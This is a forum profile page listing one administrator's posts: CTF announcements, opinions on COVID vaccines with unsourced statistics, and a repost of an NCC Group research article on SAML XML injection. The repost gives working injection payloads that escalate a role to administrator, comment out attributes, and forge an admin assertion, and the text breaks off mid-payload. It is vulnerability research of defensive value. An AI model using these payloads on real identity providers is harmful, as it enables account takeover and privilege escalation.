Jump to content

Nytro

Administrators
  • Posts

    18732
  • Joined

  • Last visited

  • Days Won

    709

Everything posted by Nytro

  1. Cele mai bune write-up-uri vor fi de asemenea premiate: 200 RON fiecare.
  2. A inceput, se va termina duminica seara (23:59). GL & HF!
  3. Cat imi plac site-urile asta, Antena3 style, care fac afirmatii fara argumente. Adica fara dovezi. Exemple: - x% din medici s-au vaccinat - De unde au site-urile astea mizerabile aceasta informatie? - Gheorghita a declarat... - Unde a declarat? Un video de la TV/conferinta de presa nu exista? Un post pe Facebook sau orice altceva? Stire a jurnalistului Nytro: "Gigel Betivul, un cunoscut membru RST, a declarat ca a baut tuica de prune pentru a preveni infectarea cu Covid. Acest experiment a avut un final neasteptat: virusul SARS-Cov2 s-a imbatat atat de rau dupa ce l-a infectat inca a decis sa se retraga din Romania. Asadar de maine toate restrictiile vor fi ridicate." Stirea mea e la fel de plauzibila ca stirile de mai sus.
  4. CTF-ul incepe in mai putin de 2 ore. PS: Am marit premiile pentru locurile 4-10.
  5. Pregatiti? Daca aveti intrebari pe parcursul concursului le vom discuta pe Slack: https://romaniansecurityteam.slack.com/
  6. Nu stiu daca exista undeva "vaccin obligatoriu". Exista doar pentru copii, pentru minori (in anumite tari si care a fost declarat legal de catre Curtea Europeana), care nu pot lua singuri decizii si e nasol ca viata lor sa depinde de un adult care urmareste niste pagini idioate de Facebook (e.g. Olivia Ster). Nici eu nu sunt de acord cu vaccinarea obligatorie pentru adulti. Pot lua singuri decizii pe care si le asuma. Darwin.
  7. Vaccinurile nu au efecte secundare grave. Mai ales daca la numarul de cazuri de cheaguri comparam numarul de cazuri de cheaguri provocate de catre Covid-19. Era o statistica 10 de cazuri cheaguri / 1.000.000 vaccinari si 16.000 de cazuri cheaguri / 1.000.000 infectari Covid. Si vreo 1500 de cazuri cheaguri / 1.000.000 fumatori. Plm, ar trebui sa ma las Sunt testate deja de peste 140.000.000 de oameni.
  8. Interesant, legat de vaccinuri si eficacitate
  9. SAML XML Injection Adam Roberts Research, Vulnerability March 29, 2021 36 Minutes The Single Sign-On (SSO) approach to authentication controls and identity management was quickly adopted by both organizations and large online services for its convenience and added security. The benefits are clear; for end-users, it is far easier to authenticate to a single service and gain access to all required applications. And for administrators, credentials and privileges can be controlled in a single location. However, this convenience presents new opportunities for attackers. A single vulnerability in the SSO authentication flow could be catastrophic, exposing data stored in all services used by an organization. This blog post will describe a class of vulnerability detected in several SSO services assessed by NCC Group, specifically affecting Security Assertion Markup Language (SAML) implementations. The flaw could allow an attacker to modify SAML responses generated by an Identity Provider, and thereby gain unauthorized access to arbitrary user accounts, or to escalate privileges within an application. What is SAML? To begin, a brief overview of how the SAML authentication flow works has been provided below. Feel free to skip this section if you are already familiar with SAML and SSO in general. SAML is a standard that allows authentication and authorization data to be securely exchanged between different contexts. It is commonly used in web applications to offer SSO capabilities, and can be easily integrated with Active Directory, making it a popular choice for applications used within enterprise environments. The authentication process relies on a trust relationship between two parties – the Identity Provider (which authenticates end-users), and the Service Provider (which is the application end-users want to access). Under the most common authentication flow, when a user wants to access a service provider, they will be redirected to the identity provider with a SAML request message. The identity provider authenticates the user if they are not already logged in, and if this is successful, it redirects the user back to the service provider with a SAML response message (usually in the body of a POST request). The SAML response message will contain an assertion that identifies the user and describes a few conditions (the expiration time for the response and an audience restriction which states the service that the assertion is valid for). The service provider should validate the response, the assertion, and the conditions, and only provide the user with access to the application if the authentication was successful. To prevent tampering, one or both of the SAML response and assertion should include a cryptographic signature that the service provider can verify. The use of a signature will ensure that a malicious user cannot simply modify the user identifier in the assertion, as the signature will no longer be valid. A more in-depth summary of SAML can be found here on PingIdentity’s website. The Vulnerability XML injection is a well-documented vulnerability class, which commonly affected older web applications utilizing XML or SOAP services in the backend. The common case involved user input being directly included in XML messages sent to the backend server. If the user input was not appropriately validated or encoded, an attacker could inject additional XML, and thereby modify request parameters or invoke additional functionality. While still relevant in some applications, XML injection is not nearly as common in 2021, with developers moving to adopt services built on newer data formats such as JSON, YAML, and Protocol Buffers. In the context of a SAML identity provider, however, XML injection is a concern, as the SAML messages constructed during the authentication flow are XML-based, and contain data that is often sourced from untrusted locations. If this data is included within a SAML assertion or response message dangerously, it may be possible for an attacker to inject additional XML, and change the structure of the SAML message. Depending on the location of the injection and the configuration of the service provider, it may be possible to inject additional roles, modify the receiver of the assertion, or to inject an entirely new username in an attempt to compromise another user’s account. Crucially, it should be noted that the XML for SAML assertions and responses is always built before a cryptographic signature is applied. Therefore, the use of response signatures does not protect against this vulnerability. This type of vulnerability is most commonly seen in SAML identity providers that naively use string templates to build the SAML XML messages. User-controlled data may be inserted into the template string using a templating language, regex match/replace, or simple concatenation. Although, it is not exclusive to this scenario; even implementations which build the XML using appropriate libraries may fall victim to this vulnerability if the library is used incorrectly. During a number of security assessments of SAML identity providers, NCC Group has successfully leveraged XML injection vulnerabilities to modify signed assertions, and thereby gain unauthorized access to arbitrary user accounts. Affected Fields When constructing the SAML response and assertion, the identity provider is highly likely to include data that can be controlled by the user, either directly or indirectly. Obvious examples include the SAML NameID, which uniquely identifies the user (this may be a numeric identifier, a username, or an email address), and additional attributes when they are requested by the service provider, such as the user’s full name, phone number, or occupation. However, there are some less obvious fields that are, in most SAML implementations, sourced from the SAML request. A non-comprehensive list of fields in the SAML request that may be included in the SAML response/assertion has been provided below: The ID of the SAML request is typically included in the InResponseTo attribute of the SAML response. (Note: in identity providers observed by NCC Group, almost all implementations included the SAML request ID in the SAML response. This field is therefore considered the most reliable for probing for XML injection vulnerabilities). The Issuer field, which identifies the issuer of the SAML request, may be included in the Audience field in the SAML assertion. The IssueInstant, which states the time the SAML request was generated, may be included in the assertion conditions NotBefore attribute. The Destination field, which states the endpoint that receives the SAML request. This field may also be used in the Audience element of the assertion. Some implementations may even include data sourced from locations external to the basic SAML authentication flow. To provide an example, in one SAML identity provider, if a SAML request was received from an unauthenticated client, the server issued a redirect to the login page with a GET parameter that included the ID of the SAML request. When the user entered their credentials, the server used the GET parameter ID to look up service provider associated with the SAML request, and then built the SAML response with this ID in the InResponseTo attribute. By modifying the ID GET parameter in the login request, it was possible to inject additional XML into the SAML response. Identifying the Vulnerability This vulnerability can be identified using common XML injection probing payloads. The following examples were recreated in a local environment, based on implementations observed during NCC Group security assessments. First, to determine whether XML injection was possible, an intercepting proxy was used to modify the SAML request sent to the identity provider. The payload was inserted into the ID attribute (bolded below) of the request, and is designed to escape from the attribute value and inject an additional attribute value (ncctest); note that the quotes in the payload are XML encoded. This is to ensure that the request XML is still valid; when the value is read by the identity provider, many implementations will XML-decode these entities: <?xml version="1.0" encoding="UTF-8"?> <samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer> <samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/> </samlp:AuthnRequest> When this was processed by the identity provider, the ID attribute was included directly within the SAML response template, in the InResponseTo attribute of the samlp:Response and saml:SubjectConfirmationData elements: <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa828226-5b49-4d14-ac7c-fb64e2263f34" Version="2.0" IssueInstant="2021-02-08T23:46:14.988Z" Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"> <saml:SubjectConfirmationData NotOnOrAfter="2021-02-08T23:51:14.988Z" Recipient="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"/> If this test is successful, an attempt can be made to inject additional XML elements into the response. While being able to modify the attributes is interesting, it is not particularly useful; if additional XML can be injected, the attacker may be able to modify the SAML assertion, and ultimately gain unauthorized access to another user’s account. As a basic test, the following SAML request was used to inject an additional XML element (ncc-elem) into the response. As before, the quotes and angle brackets are XML encoded. Also note that the injected element includes another attribute – this is to ensure that the quotes in the template used by the identity provider are balanced, and that the response is valid XML: <?xml version="1.0" encoding="UTF-8"?> <samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB&quot;&gt;&lt;ncc-elem attribute=&quot;aaaa" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer> <samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/> </samlp:AuthnRequest> This request produced the following XML in the SAML response: <samlp:Response Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" ID="_6788c1c3-03a0-452f-80d5-b0296ec1a097" IssueInstant="2021-02-08T23:57:49.488Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"> <ncc-elem attribute="aaaa"/> A similar process can be used for other injection points. If, for example, the identity provider includes the SAML request Issuer field within the Audience of the response, a payload such as the following could be used to inject additional elements. Note here that it is necessary to encode the angle brackets (&lt; and &gt;): <?xml version="1.0" encoding="UTF-8"?> <samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/generic-saml-localhost" Destination="http://127.0.0.1:8080/samlp" ID="_0699a57c1e6ac6afc3c2d7ab8cc56dec61cb09b672" IssueInstant="2021-02-11T18:51:31Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/&lt;ncc-test&gt;test&lt;/ncc-test&gt;</saml:Issuer> <samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/> </samlp:AuthnRequest> This request produced the following Audience element in the SAML assertion: <saml:AudienceRestriction> <saml:Audience>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/<ncc-test>test</ncc-test></saml:Audience> </saml:AudienceRestriction> For user attributes, the success of injecting XML characters into the SAML assertion will depend on how these attributes are updated and stored by the identity provider; if XSS defenses prevent users from storing characters such as angle brackets in their attributes, it may not be possible to perform the attack. In the following example, setting the user’s name to “Adam</saml:AttributeValue><ncc-test>aaaa</ncc-test><saml:AttributeValue>” produced the following Attribute element in the assertion. In this particular case, it was necessary to close the saml:AttributeValue element and create a new AttributeValue element to pass XML validation performed by the server: <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">Adam</saml:AttributeValue> <ncc-test>aaaa</ncc-test> <saml:AttributeValue/> </saml:Attribute> Exploiting the Vulnerability Identifying SAML XML injection vulnerabilities is fairly straightforward, but exploiting them is another story. Success will depend on a multitude of factors, including where the injection points occur, how tolerant of invalid XML the libraries used to sign and parse the SAML response are, and whether the service provider will trust the injected payload. In fact, in some cases where XML injection was possible on the identity provider, a number of service providers rejected or ignored the modified payload. Not because the signature was invalid, but because of repetition in the document. The nature of this vulnerability will mean that, in many cases, it is necessary to inject repeated elements or to construct entirely new assertions. Problems encountered as a consequence of this include: The service provider may select the original legitimate element (assertion or NameID) created by the identity provider, rather than the injected element. Many XML libraries will behave differently when selecting an element that is repeated in a document; typically, this will either be the first occurrence or the last occurrence. Some security conscious service providers may reject responses containing repeated elements altogether; there is generally no good reason for an assertion to contain two NameID elements, for example. The attack may also fail if the service provider includes defenses against XML Signature Wrapping (XSW)*. This is a well-documented SAML vulnerability, where an attacker modifies the structure of a SAML response in an attempt to trick the service provider into reading the user’s identity from an unsigned element (e.g. by adding a second unsigned assertion to a SAML response, before the legitimate signed assertion). Although an XML injection attack would mean that both assertions are included in the scope of the SAML response signature, simply the presence of a second assertion element can be enough for some service providers to reject the message. * For a good overview of XML Signature Wrapping attacks, see On Breaking SAML: Be Whoever You Want to Be Example Exploits In assessments performed by NCC Group, this vulnerability was most commonly exploitable in two scenarios; Attribute injections – where the injection occurs in a SAML attribute associated with the account in the Identity Provider. InResponseTo injections – where the injection affects the “InResponseTo” attribute of the SAML response. Example exploits for these two scenarios have been provided in the following section. As it would be impossible to demonstrate all possible XML injection attacks on SAML implementations in this blog post, hopefully these can provide some inspiration. The techniques outlined here can likely be adapted to exploit identity providers affected by this vulnerability in most configurations. Disclaimer: These examples were reproduced in a local environment specifically built to be vulnerable to this attack. Attribute Injections In addition to the NameID (which is the unique identifier for the user), SAML responses can include a set of user attributes that may be useful to the service provider. These are optional and there are no particular requirements; typically they are used to send data such as the user’s name, email address, and phone number. Some service providers also use the attributes to dictate the privileges that should be assigned to the user post-authentication, using a role attribute or similar. Therefore, if these attributes are not appropriately encoded, an attacker could inject or modify attributes to escalate their privileges or otherwise gain access to sensitive data in the service provider. As an example, if the SAML assertion contains an AttributeStatement such as the following. This includes two attributes; one for the user’s full name and another for the user’s role (viewer): <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> The attacker could change their name in the identity provider to the following value: Adam Roberts</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">administrator If the identity provider includes this value in the name attribute without appropriate validation, the following AttributeStatement will be sent to the service provider. This may allow the attacker to authenticate to the application under the context of an “administrator”, rather than a “viewer”: <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> Note that the “role” Attribute element is repeated, and it is therefore possible that the attack may fail if the service provider reads the second role attribute value, or if a validator rejects the assertion. If the attacker controls two attributes (e.g. the name and an email address), it may be possible to use XML comments to effectively delete the role attribute generated by the identity provider. Take the following AttributeStatement as an example. This includes the user’s email address, the role, and a name attribute: <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">user@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> The role attribute is included between the email and name attributes. An attacker could set their email address and name to the following values: email: user@example.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue></saml:Attribute><!-- name: --><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Adam Roberts When the AttributeStatement element is built by the identity provider, the following XML will be produced, where the “viewer” role attribute is enclosed within an XML comment: <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">user@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue> </saml:Attribute> <!--</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue></saml:Attribute><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">--> <saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> When parsed by the service provider, the user will be authenticated to the application under the context of an administrator. Comments can be a useful tool when exploiting XML injections in SAML messages. When done correctly, it is often possible to control large parts of the SAML response or assertion, meaning it can be particularly effective in subverting restrictions imposed by strict service providers. It is worth noting that most XML signature schemes used by SAML implementations canonicalize XML documents prior to calculating a signature, and as part of this process comments are removed from the document. In other words, comments in a SAML response are not considered when the signature is calculated, and can therefore be removed entirely before submission to the service provider. If it is possible to inject XML into two locations within a SAML response, the opportunities for exploitation are much greater through the use of XML comments. InResponseTo and Assertion Injections Injections which affect the InResponseTo attribute occur when the SAML request ID is included dangerously within the response. As mentioned previously, the vast majority of SAML identity providers reflect the value of the SAML request ID in the response, and this is therefore considered a very reliable attribute to probe for injections. Exploiting this type of injection, however, can be extremely difficult. The primary reason is that the the value is included in the SAML response in two locations; the first is within the InResponseTo attribute of the Response element, and the second is within the InResponseTo attribute of the SubjectConfirmationData element, in the assertion. Below is an example of a SAML response generated by an identity provider (hosted on a local server) affected by this vulnerability. The InResponseTo attribute contains the value “_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46”, which was set by the service provider in the SAML request: <?xml version="1.0" encoding="UTF-8"?> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_bb9456e6-ffbe-4117-94ca-1800923389b4" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_bb9456e6-ffbe-4117-94ca-1800923389b4"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>gj6oIvcJnXaTBtVRwyNVGaIwwEaCuO0jZizyG/Z94aU=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>ueEVB+Xt+kiZZ/g8+9LpO6IWevTatj0NnYLYUwcluqEGlYWMyXef5uQpWf89BO/j294jnIA9KifnqwvhZZr5Ma5e1UQ5/C5d3lTkSA8MTi3DZ8AuHmEtvnC83ivD9IJizcyr0KbwcHtJVzisvvYDwo/f5xq3IrFtqA18tL/mMVA=</ds:SignatureValue> <ds:KeyInfo> <ds:X509Data> <ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate> </ds:X509Data> </ds:KeyInfo> </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa80f7dc-12d1-490c-b19f-c99773167f4b" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T00:23:22.727Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-12T00:18:22.727Z" NotOnOrAfter="2021-02-12T00:23:22.727Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-12T00:18:22.727Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> The goal for most attackers here would be to inject a new assertion that includes a different NameID, and thereby gain access to another user’s account on the service provider. The following payload (decoded and formatted for readability), when included in the ID of the SAML request sent to the identity provider, achieves this. _6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> <elem test=" There are a few elements to this payload, explained below: First, “> is used to escape from the InResponseTo attribute and into the XML context. In the injected XML, copies of the Issuer and Status elements included in other responses observed from the identity provider are included. Then, an entirely new assertion is created, with a NameID which specifies the email address “admin@example.org”. This assertion was built using assertions taken from legitimate responses generated by the server; the NameID field was modified, along with the NotOnOrAfter attributes (to specify a time in the future) and the InResponseTo attribute, to include the ID of the SAML request. Replacing these values ensure that the service provider will not reject the assertion, as it will expect an assertion that is not expired, and that was generated for the SAML request it previously issued. Finally, an unrelated element “elem” is opened at the end, with an attribute. This is designed to fix dangling markup left by the Response and SubjectConfirmationData elements created by the identity provider, where the injection points occur. Note, however, that this step is considered optional, and its necessity will depend on how tolerant the XML parser is. Some parsers will reject the XML document if the dangling markup is not part of an element, while others will simply treat the dangling markup as an additional text node. If the server rejects the payload without this element, try including it in another SAML request. The following SAML request contains this payload, encoded for transport: <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46&quot;&gt;&lt;saml:Issuer&gt;http://idp.adam.local:8080&lt;/saml:Issuer&gt;&lt;samlp:Status&gt;&lt;samlp:StatusCode Value=&quot;urn:oasis:names:tc:SAML:2.0:status:Success&quot;/&gt;&lt;/samlp:Status&gt;&lt;saml:Assertion ID=&quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b&quot; IssueInstant=&quot;2021-02-11T22:45:54.579Z&quot; Version=&quot;2.0&quot; xmlns:saml=&quot;urn:oasis:names:tc:SAML:2.0:assertion&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;&lt;saml:Issuer&gt;http://idp.adam.local:8080&lt;/saml:Issuer&gt;&lt;saml:Subject&gt;&lt;saml:NameID Format=&quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&quot;&gt;admin@example.org&lt;/saml:NameID&gt;&lt;saml:SubjectConfirmation Method=&quot;urn:oasis:names:tc:SAML:2.0:cm:bearer&quot;&gt;&lt;saml:SubjectConfirmationData InResponseTo=&quot;_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46&quot; NotOnOrAfter=&quot;2021-02-11T23:50:54.579Z&quot; Recipient=&quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1&quot;/&gt;&lt;/saml:SubjectConfirmation&gt;&lt;/saml:Subject&gt;&lt;saml:Conditions NotBefore=&quot;2021-02-11T22:45:54.579Z&quot; NotOnOrAfter=&quot;2021-02-11T23:50:54.579Z&quot;&gt;&lt;saml:AudienceRestriction&gt;&lt;saml:Audience&gt;http://sp.adam.local/&lt;/saml:Audience&gt;&lt;/saml:AudienceRestriction&gt;&lt;/saml:Conditions&gt;&lt;saml:AuthnStatement 